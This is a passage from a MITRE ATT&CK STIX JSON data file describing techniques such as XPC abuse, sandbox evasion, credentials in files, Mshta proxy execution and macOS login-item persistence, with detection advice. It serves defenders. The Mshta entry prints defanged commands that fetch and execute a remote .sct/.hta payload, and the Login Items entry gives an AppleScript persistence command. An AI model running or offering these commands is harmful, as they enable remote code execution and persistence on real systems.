Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)\n\nAdversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Csaba Fitzl @theevilbit of Offensive Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_remote_support": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19", + "created": "2021-10-12T06:45:36.763Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1559/003", + "external_id": "T1559.003" + }, + { + "source_name": "creatingXPCservices", + "description": "Apple. (2016, September 9). Creating XPC Services. Retrieved April 19, 2022.", + "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1" + }, + { + "source_name": "Designing Daemons Apple Dev", + "description": "Apple. (n.d.). Retrieved October 12, 2021.", + "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html" + }, + { + "source_name": "CVMServer Vuln", + "description": "Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability in macOS and iOS. Retrieved October 12, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html" + }, + { + "source_name": "Learn XPC Exploitation", + "description": "Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved October 12, 2021.", + "url": "https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Virtualization/Sandbox Evasion", + "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Deloitte Threat Library Team", + "Sunny Neo" + ], + "x_mitre_detection": "Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Host forensic analysis", + "Signature-based detection", + "Static File Analysis" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "created": "2019-04-17T22:22:24.505Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1497", + "external_id": "T1497" + }, + { + "source_name": "Deloitte Environment Awareness", + "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.", + "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc" + }, + { + "source_name": "Unit 42 Pirpi July 2015", + "description": "Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.", + "url": "https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Web Service", + "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Anastasios Pingios" + ], + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "created": "2017-05-31T21:31:13.915Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1102", + "external_id": "T1102" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-15T21:33:00.213Z", + "name": "Credentials In Files", + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).(Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.(Citation: SRD GPP)\n\nIn cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Rory McCune, Aqua Security", + "Jay Chen, Palo Alto Networks", + "Yossi Weizman, Azure Defender Research Team", + "Vishwas Manral, McAfee", + "Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS", + "Containers" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Access to files" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", + "created": "2020-02-04T12:52:13.006Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1552/001", + "external_id": "T1552.001" + }, + { + "source_name": "CG 2014", + "description": "CG. (2014, May 20). Mimikatz Against Virtual Machine Memory Part 1. Retrieved November 12, 2014.", + "url": "http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html" + }, + { + "source_name": "Unit 42 Hildegard Malware", + "description": "Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.", + "url": "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/" + }, + { + "source_name": "Unit 42 Unsecured Docker Daemons", + "description": "Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.", + "url": "https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/" + }, + { + "source_name": "Specter Ops - Cloud Credential Storage", + "description": "Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019.", + "url": "https://posts.specterops.io/head-in-the-clouds-bd038bb69e48" + }, + { + "source_name": "SRD GPP", + "description": "Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.", + "url": "http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "DNS Calculation", + "description": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)\n\nOne implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", + "created": "2020-03-11T14:56:34.154Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1568/003", + "external_id": "T1568.003" + }, + { + "source_name": "Meyers Numbered Panda", + "description": "Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.", + "url": "http://www.crowdstrike.com/blog/whois-numbered-panda/" + }, + { + "source_name": "Moran 2014", + "description": "Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin’s Favorite APT Group [Blog]. Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + }, + { + "source_name": "Rapid7G20Espionage", + "description": "Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage Operations. Retrieved March 6, 2017.", + "url": "https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:06.993Z", + "name": "Damage to Property", + "description": "Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828). \n\n\nThe German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. \n\nA Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. (Citation: Shelley Smith February 2008) Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside. (Citation: Bruce Schneier January 2008)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0879", + "external_id": "T0879" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "BSI State of IT Security 2014", + "description": "Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30 ", + "url": "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Mshta", + "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "@ionstorm", + "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank", + "Ricardo Dias" + ], + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application control", + "Digital Certificate Validation" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "created": "2020-01-23T19:32:49.557Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/005", + "external_id": "T1218.005" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + }, + { + "source_name": "Red Canary HTA Abuse Part Deux", + "description": "McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.", + "url": "https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/" + }, + { + "source_name": "FireEye Attacks Leveraging HTA", + "description": "Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html" + }, + { + "source_name": "Airbus Security Kovter Analysis", + "description": "Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.", + "url": "https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + }, + { + "source_name": "Wikipedia HTML Application", + "description": "Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.", + "url": "https://en.wikipedia.org/wiki/HTML_Application" + }, + { + "source_name": "MSDN HTML Applications", + "description": "Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.", + "url": "https://msdn.microsoft.com/library/ms536471.aspx" + }, + { + "source_name": "LOLBAS Mshta", + "description": "LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Mshta/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Login Items", + "description": "Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled.\n\nLogin items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.\n\nAdversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as tell application “System Events” to make login item at end with properties /path/to/executable.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "All login items created via shared file lists are viewable by using the System Preferences GUI or in the ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited for known good applications.\n\nOtherwise, login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) Monitor applications that leverage login items with either the LSUIElement or LSBackgroundOnly key in the Info.plist file set to true.(Citation: Adding Login Items)(Citation: Launch Service Keys Developer Apple)\n\nMonitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior,, such as establishing network connections.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--84601337-6a55-4ad7-9c35-79e0d1ea2ab3", + "created": "2021-10-05T21:26:15.081Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/015", + "external_id": "T1547.015" + }, + { + "source_name": "Open Login Items Apple", + "description": "Apple. (n.d.). Open items automatically when you log in on Mac. Retrieved October 1, 2021.", + "url": "https://support.apple.com/guide/mac-help/open-items-automatically-when-you-log-in-mh15189/mac" + }, + { + "source_name": "Adding Login Items", + "description": "Apple. (2016, September 13). Adding Login Items. Retrieved July 11, 2017.", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html" + }, + { + "source_name": "SMLoginItemSetEnabled Schroeder 2013", + "description": "Tim Schroeder. (2013, April 21). SMLoginItemSetEnabled Demystified. Retrieved October 5, 2021.", + "url": "https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/" + }, + { + "source_name": "Launch Services Apple Developer", + "description": "Apple. (n.d.). Launch Services. Retrieved October 5, 2021.", + "url": "https://developer.apple.com/documentation/coreservices/launch_services" + }, + { + "source_name": "ELC Running at startup", + "description": "hoakley. (2018, May 22). Running at startup: when to use a Login Item or a LaunchAgent/LaunchDaemon. Retrieved October 5, 2021.", + "url": "https://eclecticlight.co/2018/05/22/running-at-startup-when-to-use-a-login-item-or-a-launchagent-launchdaemon/" + }, + { + "source_name": "Login Items AE", + "description": "Apple. (n.d.). Login Items AE. Retrieved October 4, 2021.", + "url": "https://developer.apple.com/library/archive/samplecode/LoginItemsAE/Introduction/Intro.html#//apple_ref/doc/uid/DTS10003788" + }, + { + "source_name": "Startup Items Eclectic", + "description": "hoakley. (2021, September 16). How to run an app or tool at startup. Retrieved October 5, 2021.", + "url": "https://eclecticlight.co/2021/09/16/how-to-run-an-app-or-tool-at-startup/" + }, + { + "source_name": "hexed osx.dok analysis 2019", + "description": "fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved October 4, 2021.", + "url": "http://www.hexed.in/2019/07/osxdok-analysis.html" + }, + { + "source_name": "Add List Remove Login Items Apple Script", + "description": "kaloprominat. (2013, July 30). macos: manage add list remove login items apple script. Retrieved October 5, 2021.", + "url": "https://gist.github.com/kaloprominat/6111584" + }, + { + "source_name": "objsee mac malware 2017", + "description": "Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.", + "url": "https://objective-see.com/blog/blog_0x25.html" + }, + { + "source_name": "CheckPoint Dok", + "description": "Ofer Caspi. (2017, May 4). OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic. Retrieved October 5, 2021.", + "url": "https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/" + }, + { + "source_name": "objsee netwire backdoor 2019", + "description": "Patrick Wardle. (2019, June 20). Burned by Fire(fox). Retrieved October 1, 2021.", + "url": "https://objective-see.com/blog/blog_0x44.html" + }, + { + "source_name": "objsee block blocking login items", + "description": "Patrick Wardle. (2018, July 23). Block Blocking Login Items. Retrieved October 1, 2021.", + "url": "https://objective-see.com/blog/blog_0x31.html" + }, + { + "source_name": "sentinelone macos persist Jun 2019", + "description": "Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.", + "url": "https://www.sentinelone.com/blog/how-malware-persists-on-macos/" + }, + { + "source_name": "Launch Service Keys Developer Apple", + "description": "Apple. (2018, June 4). Launch Services Keys. Retrieved October 5, 2021.", + "url": "https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-19T22:01:05.551Z", + "name": "Stage Capabilities", + "description": "Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised 